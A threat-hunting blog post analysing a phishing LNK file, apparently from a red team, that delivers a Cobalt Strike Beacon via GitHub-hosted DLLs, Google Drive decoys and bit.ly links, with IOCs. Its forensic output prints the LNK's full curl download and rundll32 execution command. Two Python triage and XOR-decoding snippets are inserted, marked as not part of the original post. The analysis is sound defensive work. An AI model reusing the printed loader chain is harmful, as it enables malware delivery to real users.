Hunting Unknown RedTeam CobaltStrike Beacon

Introduction

Hello. I am morimolymoly.

I accidentally hunted what I guess is an unknown RedTeam's CobaltStrike Beacon.

I tweeted this case in 2022.

Hunting

I was hunting DPRK's CryptoMimic campaign with VirusTotal LiveHunt. However, a different actor using similar TTPs was caught accidentally.


TTPs

CryptoMimic used a malicious LNK file containing a bitly link to malware. The TTP in this case is similar.

However, this threat actor abused GitHub and Google Drive.

This is the funny point of this case.

Analysis

I analyzed the LNK file with LECmd.

LECmd version 1.5.0.0

Author: Eric Zimmerman (saericzimmerman@gmail.com)
https://github.com/EricZimmerman/LECmd

Command line: -f .\aaaaaa.lnk

Warning: Administrator privileges not found!


Processing C:\Users\moly\Desktop\lnk-bitly-221214\aaaaaa.lnk

Source file: C:\Users\moly\Desktop\lnk-bitly-221214\aaaaaa.lnk
  Source created:  2022-12-13 23:33:36
  Source modified: 2022-12-13 23:33:36
  Source accessed: 2022-12-13 23:33:36

--- Header ---
  Target created:  2022-10-21 16:53:41
  Target modified: 2022-10-21 16:53:41
  Target accessed: 2022-12-12 10:46:28

  File size: 236,544
  Flags: HasTargetIdList, HasLinkInfo, HasArguments, HasIconLocation, IsUnicode, HasExpString
  File attributes: FileAttributeArchive
  Icon index: 0
  Show window: SwNormal (Activates and displays the window. The window is restored to its original size and position if the window is minimized or maximized.)

Arguments: /c "start /B C:\"Program Files (x86)"\Microsoft\Edge\Application\msedge.exe --kiosk https://bit.ly/3Pkc8Kw & start /B C:\Windows\System32\curl.exe -s -L -o %temp%\t.dll https://bit.ly/3Fmt3aC & timeout 2 & rundll32 %temp%\t.dll,mydllmain"
Icon Location: %ProgramW6432%\Adobe\Acrobat DC\Acrobat\Acrobat.exe

--- Link information ---
Flags: VolumeIdAndLocalBasePath

>> Volume information
  Drive type: Fixed storage media (Hard drive)
  Serial number: 4843E915
  Label: (No label)
  Local path: C:\Windows\System32\cmd.exe

--- Target ID information (Format: Type ==> Value) ---

  Absolute path: My Computer\C:\\\

  -Root folder: GUID ==> My Computer

  -Drive letter ==> C:

  -Directory ==> (None)
    Short name: Windows
    Modified:    2022-12-12 10:01:44
    Extension block count: 1

    --------- Block 0 (Beef0004) ---------
    Long name: 
    Created:     2019-12-07 09:03:46
    Last access: 2022-12-12 10:01:44
    MFT entry/sequence #: 134345/125 (0x20CC9/0x7D)

  -Directory ==> (None)
    Short name: System32
    Modified:    2022-11-24 14:04:08
    Extension block count: 1

    --------- Block 0 (Beef0004) ---------
    Long name: 
    Created:     2019-12-07 09:03:46
    Last access: 2022-12-12 10:51:08
    MFT entry/sequence #: 207770/58 (0x32B9A/0x3A)

  -File ==> (None)
    Short name: cmd.exe
    Modified:    2022-10-21 16:53:42
    Extension block count: 1

    --------- Block 0 (Beef0004) ---------
    Long name: 
    Created:     2022-10-21 16:53:42
    Last access: 2022-12-12 10:46:30
    MFT entry/sequence #: 378353/49 (0x5C5F1/0x31)

--- End Target ID information ---

--- Extra blocks information ---

>> Environment variable data block
   Environment variables: %COMSPEC% 

>> Special folder data block
   Special Folder ID: 37

>> Known folder data block
   Known folder GUID: 1ac14e77-02e7-4e5d-b744-2eb1ae5198b7 ==> System32

>> Tracker database block
   Machine ID:  vm01
   MAC Address: 08:00:27:68:4d:30
   MAC Vendor:  PCS SYSTEMTECHNIK
   Creation:    2022-11-28 11:27:11

   Volume Droid:       66055d2a-26cb-4919-96d2-3aff711ffc8b
   Volume Droid Birth: 66055d2a-26cb-4919-96d2-3aff711ffc8b
   File Droid:         99cf2333-6f0f-11ed-b3f3-080027684d30
   File Droid birth:   99cf2333-6f0f-11ed-b3f3-080027684d30

>> Property store data block (Format: GUID\ID Description ==> Value)
   46588ae2-4cbc-4338-bbfc-139326986dce\4      SID                                 ==> S-1-5-21-2536987187-3715387138-3086421273-1001
   446d16b1-8dad-4870-a748-402ea43d788c\104    Volume Id                           ==> Unmapped GUID: 72f0c558-0000-0000-0000-501f00000000

This LNK file downloads malware (a DLL, t.dll) from a bitly link with curl and launches t.dll's mydllmain function via rundll32.

The naming seems so cheap.

I guessed that this was not done by BlueNoroff.

I started to analyze the malware itself.

The sample's VirusTotal page is below.
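As an added example (not part of the original post), here is a small triage routine that scores an LNK Arguments string against the chain seen above: a shortener URL, a browser opened in kiosk mode as a decoy, curl dropping a file, a sleep, and rundll32 executing the same dropped file. The sample string is the one LECmd recovered; the weights are my own assumption.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: the Arguments string LECmd recovered from the LNK above.
SAMPLE_ARGS = (
    r'/c "start /B C:\"Program Files (x86)"\Microsoft\Edge\Application\msedge.exe '
    r'--kiosk https://bit.ly/3Pkc8Kw & start /B C:\Windows\System32\curl.exe -s -L '
    r'-o %temp%\t.dll https://bit.ly/3Fmt3aC & timeout 2 & rundll32 %temp%\t.dll,mydllmain"'
)

URL_RE = re.compile(r"https?://[^\s\"&]+", re.I)
CURL_RE = re.compile(r"curl(?:\.exe)?\b.*?\s-o\s+(\S+)", re.I)      # curl ... -o <path>
RUNDLL_RE = re.compile(r"rundll32(?:\.exe)?\s+(\S+?),(\w+)", re.I)  # rundll32 <dll>,<export>
SHORTENERS = ("bit.ly", "tinyurl.com", "t.co", "goo.gl")

@dataclass
class LnkTriage:
    urls: list = field(default_factory=list)
    dropped_path: str = ""
    rundll32_target: str = ""
    rundll32_export: str = ""
    reasons: list = field(default_factory=list)
    score: int = 0  # assumed weights; tune to your environment

def triage_lnk_arguments(args: str) -> LnkTriage:
    """Split a cmd.exe /c chain on '&' and score each stage against the TTP."""
    t = LnkTriage()
    t.urls = URL_RE.findall(args)
    if any(u.lower().split("/")[2] in SHORTENERS for u in t.urls):
        t.reasons.append("URL shortener hides the final host"); t.score += 2
    for stage in (s.strip() for s in args.split("&")):
        if "--kiosk" in stage.lower() and t.urls:
            t.reasons.append("browser opened full-screen on a URL (decoy)"); t.score += 1
        m = CURL_RE.search(stage)
        if m:
            t.dropped_path = m.group(1)
            t.reasons.append(f"curl drops {t.dropped_path}"); t.score += 2
        if re.match(r"timeout\s+\d+", stage, re.I):
            t.reasons.append("sleep between download and execution"); t.score += 1
        m = RUNDLL_RE.search(stage)
        if m:
            t.rundll32_target, t.rundll32_export = m.group(1), m.group(2)
            t.reasons.append(f"rundll32 {t.rundll32_target},{t.rundll32_export}"); t.score += 2
    if t.dropped_path and t.dropped_path.lower() == t.rundll32_target.lower():
        t.reasons.append("downloaded file is the rundll32 payload"); t.score += 3
    if "%temp%" in (t.dropped_path + t.rundll32_target).lower():
        t.reasons.append("payload staged in %temp%"); t.score += 1
    return t

if __name__ == "__main__":
    result = triage_lnk_arguments(SAMPLE_ARGS)
    print(result.score, *result.reasons, sep="\n  ")
```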


It creates an IE process and injects shellcode.

The shellcode is XORed, as you can see.

I dumped the shellcode with x64dbg.

The shellcode is below.
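As an added example (not the author's code), this recovers a short repeating XOR key from a dumped blob by using the widely documented prologue of x64 Cobalt Strike/Metasploit shellcode (cld; and rsp,-16; call ...) as known plaintext. The encoded blob and the key are constructed here; the real sample's key is not stated in the post.

```python
from typing import Optional

# Known plaintext assumption: x64 stager shellcode starts with
# FC (cld) 48 83 E4 F0 (and rsp,-16) E8 (call ...).
KNOWN_PROLOGUE = bytes.fromhex("fc4883e4f0e8")

def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Apply a repeating-key XOR (the same operation encodes and decodes)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def recover_xor_key(blob: bytes, known: bytes = KNOWN_PROLOGUE,
                    max_len: int = 4) -> Optional[bytes]:
    """Try key lengths 1..max_len. Each candidate key is read off the first
    klen bytes and must then reproduce the whole known prefix; keeping
    max_len below len(known) leaves bytes to verify the candidate against."""
    for klen in range(1, min(max_len, len(known) - 1) + 1):
        candidate = bytes(blob[i] ^ known[i] for i in range(klen))
        if xor_bytes(blob[:len(known)], candidate) == known:
            return candidate
    return None

def decode_dump(blob: bytes) -> Optional[bytes]:
    """Return the decoded shellcode, or None if no consistent key is found."""
    key = recover_xor_key(blob)
    return xor_bytes(blob, key) if key else None

# Constructed sample: prologue plus the usual register pushes, XORed with a 3-byte key.
SAMPLE_KEY = b"\x5a\xa7\x13"
SAMPLE_PLAIN = KNOWN_PROLOGUE + bytes.fromhex("c8000000415141505251565748") + b"\x90" * 16
SAMPLE_BLOB = xor_bytes(SAMPLE_PLAIN, SAMPLE_KEY)

if __name__ == "__main__":
    print("key:", recover_xor_key(SAMPLE_BLOB), "decoded:", decode_dump(SAMPLE_BLOB)[:8].hex())
```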


I found an interesting string in the malware (t.dll).

So I call this malware SysLoader.

When you launch SysLoader, you see a decoy document file while the shellcode (CobaltStrike Beacon) is running.

SysLoader is reached via a bitly link, but it was actually hosted in a GitHub repo.

Web service abuse

The decoy document was hosted on Google Drive.

SysLoader was hosted on GitHub.

A maldoc is also hosted there, as you can see.

I ran olevba on this maldoc. It contains a macro which downloads and kicks off SysLoader.

Here is the commit log of the repository.

I just wanted to see the traffic, so I launched FakeNet-NG and watched what was going on.

Then I realized this is a CobaltStrike Beacon and the profile is Pandora.


The CobaltStrike Beacon's watermark is 546921291.

This watermark seems to be a legit one, so I attributed this actor to some RedTeam. The C2 server is located in the AWS Japan region. This does not make sense for APTs.

Summary

This actor seems to be a RedTeamer of some company.

The malware itself is so cheap to analyze.

There is no obfuscation or packer.

I guess the Cobalt Strike Beacon is an original, legit one, judging from the watermark.

I think that this operation was done by some RedTeam to test its TTPs.

IOCs

  • hxxps://github.com/encerepo/resources
  • 38.242.255[.]184
  • C2: dqfkmwvib0lbb[.]cloudfront[.]net
  • C2: 18.65.152[.]13